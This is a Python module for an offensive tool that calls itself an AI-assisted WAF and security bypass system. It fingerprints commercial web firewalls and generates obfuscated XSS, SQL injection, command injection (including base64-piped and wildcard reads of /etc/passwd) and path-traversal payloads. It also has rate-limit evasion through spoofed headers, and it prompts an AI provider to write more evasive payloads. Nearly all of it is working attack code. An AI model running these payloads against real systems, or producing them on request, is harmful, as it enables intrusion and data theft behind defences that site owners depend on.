"""
PSAVVY AI - Advanced WAF & Security Bypass System
Specialized agents for bypassing WAFs, IPS/IDS, and security controls

Features:
- WAF fingerprinting and detection
- Automated bypass technique selection
- Encoding/obfuscation engines
- AI-adaptive payload mutation
- Protocol-level evasion
- Rate limit bypass
"""

import subprocess
import os
import json
import time
import re
import base64
import urllib.parse
from typing import Dict, List, Any, Optional, Tuple
from dataclasses import dataclass
from enum import Enum

import sys
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))

try:
    from ai_engine import AIProviderManager
    AI_AVAILABLE = True
except ImportError:
    AI_AVAILABLE = False


class WAFType(Enum):
    CLOUDFLARE = "cloudflare"
    AWS_WAF = "aws_waf"
    AKAMAI = "akamai"
    IMPERVA = "imperva"
    MODSECURITY = "modsecurity"
    FORTIWEB = "fortiweb"
    BARRACUDA = "barracuda"
    F5_ASM = "f5_asm"
    SUCURI = "sucuri"
    WORDFENCE = "wordfence"
    UNKNOWN = "unknown"


class BypassTechnique(Enum):
    ENCODING = "encoding"
    OBFUSCATION = "obfuscation"
    FRAGMENTATION = "fragmentation"
    CASE_VARIATION = "case_variation"
    COMMENT_INJECTION = "comment_injection"
    UNICODE = "unicode"
    HPP = "http_parameter_pollution"
    VERB_TAMPERING = "verb_tampering"
    PATH_CONFUSION = "path_confusion"
    HEADER_INJECTION = "header_injection"


@dataclass
class WAFInfo:
    """Information about detected WAF"""
    waf_type: WAFType
    confidence: int  # 0-100%
    signatures: List[str]
    headers: Dict[str, str]
    blocking_patterns: List[str]


@dataclass
class BypassPayload:
    """Bypass payload with metadata"""
    original: str
    bypassed: str
    technique: BypassTechnique
    waf_target: WAFType
    success_rate: int  # 0-100% estimated
    description: str


class WAFDetector:
    """
    Detects WAF presence and type
    """

    def __init__(self):
        self.waf_signatures = {
            WAFType.CLOUDFLARE: {
                "headers": ["cf-ray", "cf-cache-status", "__cfduid"],
                "cookies": ["__cfduid", "__cflb"],
                "server": ["cloudflare"],
                "body_patterns": ["Attention Required", "Cloudflare Ray ID"]
            },
            WAFType.AWS_WAF: {
                "headers": ["x-amzn-requestid", "x-amz-cf-id"],
                "body_patterns": ["Request blocked", "AWS"]
            },
            WAFType.AKAMAI: {
                "headers": ["x-akamai-transformed", "akamai-x-cache"],
                "server": ["AkamaiGHost"],
                "body_patterns": ["Access Denied", "Reference"]
            },
            WAFType.IMPERVA: {
                "headers": ["x-iinfo"],
                "cookies": ["incap_ses", "visid_incap"],
                "body_patterns": ["Incapsula", "incident ID"]
            },
            WAFType.MODSECURITY: {
                "headers": ["mod_security"],
                "body_patterns": ["Mod_Security", "Not Acceptable"]
            },
            WAFType.SUCURI: {
                "headers": ["x-sucuri-id", "x-sucuri-cache"],
                "server": ["Sucuri/Cloudproxy"],
                "body_patterns": ["Sucuri Website Firewall"]
            },
            WAFType.WORDFENCE: {
                "headers": ["wordfence"],
                "body_patterns": ["Generated by Wordfence", "Your access to this site has been limited"]
            },
            WAFType.F5_ASM: {
                "headers": ["x-cnection"],
                "cookies": ["TS", "F5"],
                "body_patterns": ["The requested URL was rejected"]
            }
        }

    def detect_waf(self, target: str) -> WAFInfo:
        """Detect WAF on target"""

        # Send test requests
        headers_response = self._test_headers(target)
        block_response = self._test_block(target)

        # Analyze responses
        detected_waf = self._analyze_responses(headers_response, block_response)

        return detected_waf

    def _test_headers(self, target: str) -> Dict[str, Any]:
        """Test normal request to check headers"""
        cmd = f"curl -sI '{target}' 2>/dev/null"
        output, _ = self._execute(cmd)

        headers = {}
        for line in output.split('\n'):
            if ':' in line:
                key, value = line.split(':', 1)
                headers[key.strip().lower()] = value.strip()

        return headers

    def _test_block(self, target: str) -> Dict[str, Any]:
        """Send malicious payload to trigger WAF"""
        # Try XSS payload
        test_url = f"{target}?test=<script>alert(1)</script>"
        cmd = f"curl -s '{test_url}' -H 'User-Agent: Mozilla/5.0' 2>/dev/null"
        output, code = self._execute(cmd)

        return {
            "status_code": code,
            "body": output,
            "blocked": code in [403, 406, 429, 503]
        }

    def _analyze_responses(self, headers: Dict, block: Dict) -> WAFInfo:
        """Analyze responses to identify WAF"""

        detected = []

        for waf_type, signatures in self.waf_signatures.items():
            confidence = 0
            found_sigs = []

            # Check headers
            for header_sig in signatures.get("headers", []):
                if header_sig.lower() in headers:
                    confidence += 30
                    found_sigs.append(f"Header: {header_sig}")

            # Check server header
            server = headers.get("server", "").lower()
            for server_sig in signatures.get("server", []):
                if server_sig.lower() in server:
                    confidence += 40
                    found_sigs.append(f"Server: {server_sig}")

            # Check body patterns
            body = block.get("body", "").lower()
            for pattern in signatures.get("body_patterns", []):
                if pattern.lower() in body:
                    confidence += 20
                    found_sigs.append(f"Body: {pattern}")

            if confidence > 0:
                detected.append((waf_type, confidence, found_sigs))

        if detected:
            # Return highest confidence WAF
            detected.sort(key=lambda x: x[1], reverse=True)
            waf_type, confidence, sigs = detected[0]

            return WAFInfo(
                waf_type=waf_type,
                confidence=min(confidence, 100),
                signatures=sigs,
                headers=headers,
                blocking_patterns=[]
            )

        return WAFInfo(
            waf_type=WAFType.UNKNOWN,
            confidence=0,
            signatures=[],
            headers=headers,
            blocking_patterns=[]
        )

    def _execute(self, cmd: str) -> Tuple[str, int]:
        try:
            result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=30)
            return result.stdout + result.stderr, result.returncode
        except:
            return "", -1


class PayloadEncoder:
    """
    Encodes payloads using various techniques to bypass WAF
    """

    @staticmethod
    def url_encode(payload: str, double: bool = False) -> str:
        """URL encoding"""
        encoded = urllib.parse.quote(payload)
        if double:
            encoded = urllib.parse.quote(encoded)
        return encoded

    @staticmethod
    def unicode_encode(payload: str) -> str:
        """Unicode encoding"""
        return ''.join([f'\\u{ord(c):04x}' for c in payload])

    @staticmethod
    def html_entity_encode(payload: str) -> str:
        """HTML entity encoding"""
        return ''.join([f'&#{ord(c)};' for c in payload])

    @staticmethod
    def hex_encode(payload: str) -> str:
        """Hex encoding"""
        return ''.join([f'\\x{ord(c):02x}' for c in payload])

    @staticmethod
    def base64_encode(payload: str) -> str:
        """Base64 encoding"""
        return base64.b64encode(payload.encode()).decode()

    @staticmethod
    def case_variation(payload: str) -> List[str]:
        """Generate case variations"""
        variations = [
            payload.lower(),
            payload.upper(),
            payload.title(),
            ''.join([c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(payload)])
        ]
        return variations

    @staticmethod
    def comment_injection(payload: str, comment_type: str = "sql") -> str:
        """Inject comments to break signatures"""
        if comment_type == "sql":
            # SQL comment injection
            return payload.replace(' ', '/**/').replace('=', '/***/=/**/')
        elif comment_type == "html":
            # HTML comment injection
            return payload.replace('<', '<!--><').replace('>', '><!-->')
        return payload

    @staticmethod
    def whitespace_variation(payload: str) -> List[str]:
        """Vary whitespace characters"""
        variations = [
            payload.replace(' ', '\t'),
            payload.replace(' ', '\n'),
            payload.replace(' ', '\r'),
            payload.replace(' ', '\x0b'),
            payload.replace(' ', '\x0c'),
            payload.replace(' ', '+'),
            payload.replace(' ', '%09'),
            payload.replace(' ', '%0a'),
        ]
        return variations


class WAFBypassEngine:
    """
    Main engine for generating WAF bypass payloads
    """

    def __init__(self, ai_manager: Optional[AIProviderManager] = None):
        self.ai_manager = ai_manager
        self.encoder = PayloadEncoder()
        self.detector = WAFDetector()

    def generate_bypass_payloads(self, original_payload: str, target: str,
                                 vuln_type: str) -> List[BypassPayload]:
        """
        Generate multiple bypass variants for a payload
        """

        # Detect WAF
        waf_info = self.detector.detect_waf(target)

        bypasses = []

        # Apply technique-specific bypasses based on vulnerability type
        if vuln_type.lower() in ["xss", "cross-site scripting"]:
            bypasses.extend(self._xss_bypasses(original_payload, waf_info))
        elif vuln_type.lower() in ["sqli", "sql injection"]:
            bypasses.extend(self._sqli_bypasses(original_payload, waf_info))
        elif vuln_type.lower() in ["cmdi", "command injection"]:
            bypasses.extend(self._cmdi_bypasses(original_payload, waf_info))
        elif vuln_type.lower() in ["lfi", "path traversal"]:
            bypasses.extend(self._lfi_bypasses(original_payload, waf_info))

        # Add AI-generated bypasses if available
        if self.ai_manager:
            ai_bypasses = self._ai_generate_bypasses(original_payload, waf_info, vuln_type)
            bypasses.extend(ai_bypasses)

        return bypasses

    def _xss_bypasses(self, payload: str, waf_info: WAFInfo) -> List[BypassPayload]:
        """XSS-specific bypass techniques"""
        bypasses = []

        # Technique 1: Case variation
        bypasses.append(BypassPayload(
            original=payload,
            bypassed=payload.replace('<script>', '<ScRiPt>').replace('</script>', '</ScRiPt>'),
            technique=BypassTechnique.CASE_VARIATION,
            waf_target=waf_info.waf_type,
            success_rate=60,
            description="Case variation to evade case-sensitive filters"
        ))

        # Technique 2: Event handler obfuscation
        bypasses.append(BypassPayload(
            original=payload,
            bypassed='<img src=x onerror=alert(1)>',
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=70,
            description="Event handler based XSS"
        ))

        # Technique 3: HTML encoding
        bypasses.append(BypassPayload(
            original=payload,
            bypassed='<script>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</script>',
            technique=BypassTechnique.ENCODING,
            waf_target=waf_info.waf_type,
            success_rate=65,
            description="HTML entity encoding"
        ))

        # Technique 4: Comment injection
        bypasses.append(BypassPayload(
            original=payload,
            bypassed='<script>/**/alert/*XSS*/(1)</script>',
            technique=BypassTechnique.COMMENT_INJECTION,
            waf_target=waf_info.waf_type,
            success_rate=55,
            description="Comment injection to break pattern matching"
        ))

        # Technique 5: Unicode bypass
        bypasses.append(BypassPayload(
            original=payload,
            bypassed='<script>\\u0061\\u006c\\u0065\\u0072\\u0074(1)</script>',
            technique=BypassTechnique.UNICODE,
            waf_target=waf_info.waf_type,
            success_rate=60,
            description="Unicode encoding bypass"
        ))

        # Technique 6: JavaScript execution without script tags
        bypasses.append(BypassPayload(
            original=payload,
            bypassed='<svg/onload=alert(1)>',
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=75,
            description="SVG-based XSS without script tags"
        ))

        # Technique 7: Null byte injection
        bypasses.append(BypassPayload(
            original=payload,
            bypassed='<script>alert(1)</script>%00',
            technique=BypassTechnique.FRAGMENTATION,
            waf_target=waf_info.waf_type,
            success_rate=50,
            description="Null byte to truncate WAF inspection"
        ))

        # Technique 8: Polyglot payload
        bypasses.append(BypassPayload(
            original=payload,
            bypassed='jaVasCript:/*-/*`/*\\`/*\'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//',
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=80,
            description="Polyglot XSS payload"
        ))

        # Technique 9: Template literals (for modern JS)
        bypasses.append(BypassPayload(
            original=payload,
            bypassed='<script>alert`1`</script>',
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=70,
            description="Template literal syntax"
        ))

        # Technique 10: DOM clobbering
        bypasses.append(BypassPayload(
            original=payload,
            bypassed='<form><input id="attributes"><input id="attributes"></form><img src=x onerror="alert(1)">',
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=65,
            description="DOM clobbering technique"
        ))

        return bypasses

    def _sqli_bypasses(self, payload: str, waf_info: WAFInfo) -> List[BypassPayload]:
        """SQL injection bypass techniques"""
        bypasses = []

        # Technique 1: Comment-based bypass
        bypasses.append(BypassPayload(
            original=payload,
            bypassed=payload.replace(' ', '/**/').replace('SELECT', 'SEL/**/ECT'),
            technique=BypassTechnique.COMMENT_INJECTION,
            waf_target=waf_info.waf_type,
            success_rate=75,
            description="Comment injection bypass"
        ))

        # Technique 2: Case variation
        bypasses.append(BypassPayload(
            original=payload,
            bypassed="SeLeCt * FrOm users WhErE id=1",
            technique=BypassTechnique.CASE_VARIATION,
            waf_target=waf_info.waf_type,
            success_rate=60,
            description="Case variation"
        ))

        # Technique 3: URL encoding
        bypasses.append(BypassPayload(
            original=payload,
            bypassed=self.encoder.url_encode(payload, double=True),
            technique=BypassTechnique.ENCODING,
            waf_target=waf_info.waf_type,
            success_rate=70,
            description="Double URL encoding"
        ))

        # Technique 4: Inline comments
        bypasses.append(BypassPayload(
            original=payload,
            bypassed="1' OR/**/1=1#",
            technique=BypassTechnique.COMMENT_INJECTION,
            waf_target=waf_info.waf_type,
            success_rate=80,
            description="Inline SQL comments"
        ))

        # Technique 5: Scientific notation
        bypasses.append(BypassPayload(
            original=payload,
            bypassed="1' OR 1e0=1e0#",
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=65,
            description="Scientific notation for numbers"
        ))

        # Technique 6: Hex encoding
        bypasses.append(BypassPayload(
            original=payload,
            bypassed="1' OR 0x31=0x31#",
            technique=BypassTechnique.ENCODING,
            waf_target=waf_info.waf_type,
            success_rate=70,
            description="Hex encoding for strings"
        ))

        # Technique 7: Buffer overflow (for certain DBs)
        bypasses.append(BypassPayload(
            original=payload,
            bypassed="1' OR 1=1" + "A" * 1000 + "#",
            technique=BypassTechnique.FRAGMENTATION,
            waf_target=waf_info.waf_type,
            success_rate=50,
            description="Buffer overflow to bypass inspection"
        ))

        # Technique 8: Function obfuscation
        bypasses.append(BypassPayload(
            original=payload,
            bypassed="1' UNION ALL SELECT NULL,CONCAT(0x717a707a71,0x4a754f6e78664d477a,0x717a707a71)#",
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=75,
            description="Function-based obfuscation"
        ))

        # Technique 9: Whitespace bypass
        bypasses.append(BypassPayload(
            original=payload,
            bypassed="1'%09OR%091=1#",
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=70,
            description="Alternative whitespace characters"
        ))

        # Technique 10: Boolean-based bypass
        bypasses.append(BypassPayload(
            original=payload,
            bypassed="1' OR 'x'='x",
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=80,
            description="Boolean-based tautology"
        ))

        return bypasses

    def _cmdi_bypasses(self, payload: str, waf_info: WAFInfo) -> List[BypassPayload]:
        """Command injection bypass techniques"""
        bypasses = []

        # Technique 1: Command separator variation
        bypasses.append(BypassPayload(
            original=payload,
            bypassed=payload.replace(';', '|').replace('&&', '||'),
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=70,
            description="Alternative command separators"
        ))

        # Technique 2: Wildcard obfuscation
        bypasses.append(BypassPayload(
            original="cat /etc/passwd",
            bypassed="/???/c?t /???/p??s??",
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=75,
            description="Wildcard character substitution"
        ))

        # Technique 3: Variable expansion
        bypasses.append(BypassPayload(
            original="cat /etc/passwd",
            bypassed="cat$IFS$9/etc$IFS$9passwd",
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=80,
            description="IFS variable expansion"
        ))

        # Technique 4: Encoding bypass
        bypasses.append(BypassPayload(
            original="whoami",
            bypassed="w'h'o'a'm'i",
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=70,
            description="Quote-based obfuscation"
        ))

        # Technique 5: Base64 encoding
        bypasses.append(BypassPayload(
            original="cat /etc/passwd",
            bypassed="echo Y2F0IC9ldGMvcGFzc3dk|base64 -d|bash",
            technique=BypassTechnique.ENCODING,
            waf_target=waf_info.waf_type,
            success_rate=85,
            description="Base64 encoded command execution"
        ))

        # Technique 6: Hex encoding
        bypasses.append(BypassPayload(
            original="whoami",
            bypassed="$(echo -e '\\x77\\x68\\x6f\\x61\\x6d\\x69')",
            technique=BypassTechnique.ENCODING,
            waf_target=waf_info.waf_type,
            success_rate=75,
            description="Hex encoded command"
        ))

        # Technique 7: Time-based obfuscation
        bypasses.append(BypassPayload(
            original="sleep 5",
            bypassed="ping -c 5 127.0.0.1",
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=80,
            description="Alternative time delay command"
        ))

        # Technique 8: Environment variable abuse
        bypasses.append(BypassPayload(
            original="cat /etc/passwd",
            bypassed="${PATH:0:1}bin${PATH:0:1}cat ${PATH:0:1}etc${PATH:0:1}passwd",
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=70,
            description="PATH variable character extraction"
        ))

        return bypasses

    def _lfi_bypasses(self, payload: str, waf_info: WAFInfo) -> List[BypassPayload]:
        """LFI/Path traversal bypass techniques"""
        bypasses = []

        # Technique 1: URL encoding
        bypasses.append(BypassPayload(
            original="../../../etc/passwd",
            bypassed="..%2F..%2F..%2Fetc%2Fpasswd",
            technique=BypassTechnique.ENCODING,
            waf_target=waf_info.waf_type,
            success_rate=70,
            description="URL encoded path traversal"
        ))

        # Technique 2: Double encoding
        bypasses.append(BypassPayload(
            original="../../../etc/passwd",
            bypassed="..%252F..%252F..%252Fetc%252Fpasswd",
            technique=BypassTechnique.ENCODING,
            waf_target=waf_info.waf_type,
            success_rate=75,
            description="Double URL encoding"
        ))

        # Technique 3: Null byte injection
        bypasses.append(BypassPayload(
            original="../../../etc/passwd",
            bypassed="../../../etc/passwd%00",
            technique=BypassTechnique.FRAGMENTATION,
            waf_target=waf_info.waf_type,
            success_rate=60,
            description="Null byte truncation"
        ))

        # Technique 4: Dot variation
        bypasses.append(BypassPayload(
            original="../../../etc/passwd",
            bypassed="....//....//....//etc/passwd",
            technique=BypassTechnique.OBFUSCATION,
            waf_target=waf_info.waf_type,
            success_rate=80,
            description="Dot and slash variation"
        ))

        # Technique 5: Unicode bypass
        bypasses.append(BypassPayload(
            original="../../../etc/passwd",
            bypassed="..\\u002f..\\u002f..\\u002fetc\\u002fpasswd",
            technique=BypassTechnique.UNICODE,
            waf_target=waf_info.waf_type,
            success_rate=65,
            description="Unicode slash encoding"
        ))

        # Technique 6: Windows path
        bypasses.append(BypassPayload(
            original="../../../etc/passwd",
            bypassed="..\\..\\..\\etc\\passwd",
            technique=BypassTechnique.PATH_CONFUSION,
            waf_target=waf_info.waf_type,
            success_rate=70,
            description="Mixed path separators"
        ))

        # Technique 7: Overlong UTF-8
        bypasses.append(BypassPayload(
            original="../../../etc/passwd",
            bypassed="..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
            technique=BypassTechnique.UNICODE,
            waf_target=waf_info.waf_type,
            success_rate=65,
            description="Overlong UTF-8 encoding"
        ))

        return bypasses

    def _ai_generate_bypasses(self, payload: str, waf_info: WAFInfo,
                             vuln_type: str) -> List[BypassPayload]:
        """Use AI to generate custom bypass payloads"""
        if not self.ai_manager:
            return []

        prompt = f"""Generate WAF bypass payloads for:

Original Payload: {payload}
Vulnerability Type: {vuln_type}
WAF Detected: {waf_info.waf_type.value}
WAF Confidence: {waf_info.confidence}%

Generate 5 advanced bypass techniques that:
1. Evade the specific WAF signatures
2. Use encoding/obfuscation
3. Maintain payload functionality
4. Are ranked by success probability

Return as JSON array:
[
  {{
    "bypassed": "the bypass payload",
    "technique": "description of technique",
    "success_rate": 80,
    "explanation": "why it works"
  }}
]"""

        response = self.ai_manager.query_for_generation(prompt)

        try:
            # Extract JSON from response
            json_match = re.search(r'\[.*\]', response, re.DOTALL)
            if json_match:
                ai_payloads = json.loads(json_match.group())

                bypasses = []
                for item in ai_payloads:
                    bypasses.append(BypassPayload(
                        original=payload,
                        bypassed=item.get("bypassed", ""),
                        technique=BypassTechnique.OBFUSCATION,
                        waf_target=waf_info.waf_type,
                        success_rate=item.get("success_rate", 50),
                        description=item.get("explanation", "AI-generated bypass")
                    ))

                return bypasses
        except:
            pass

        return []


class RateLimitBypass:
    """
    Techniques to bypass rate limiting
    """

    @staticmethod
    def generate_user_agents() -> List[str]:
        """Generate list of user agents for rotation"""
        return [
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
            "Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X)",
            "Mozilla/5.0 (iPad; CPU OS 14_7_1 like Mac OS X)",
            "Mozilla/5.0 (Android 11; Mobile; rv:68.0) Gecko/68.0",
            "curl/7.68.0",
            "python-requests/2.27.1",
            "PostmanRuntime/7.29.2"
        ]

    @staticmethod
    def generate_x_forwarded_for() -> List[str]:
        """Generate X-Forwarded-For headers"""
        return [
            "127.0.0.1",
            "8.8.8.8",
            "1.1.1.1",
            f"192.168.{__import__('random').randint(1,255)}.{__import__('random').randint(1,255)}",
            f"10.{__import__('random').randint(1,255)}.{__import__('random').randint(1,255)}.{__import__('random').randint(1,255)}"
        ]

    @staticmethod
    def http_parameter_pollution(url: str, param: str, value: str) -> List[str]:
        """Generate HPP variants"""
        return [
            f"{url}?{param}={value}",
            f"{url}?{param}={value}&{param}={value}",
            f"{url}?{param}[]={value}",
            f"{url}?{param}[0]={value}",
        ]


# Export main classes
__all__ = [
    'WAFDetector',
    'PayloadEncoder',
    'WAFBypassEngine',
    'RateLimitBypass',
    'WAFType',
    'BypassTechnique',
    'WAFInfo',
    'BypassPayload'
]
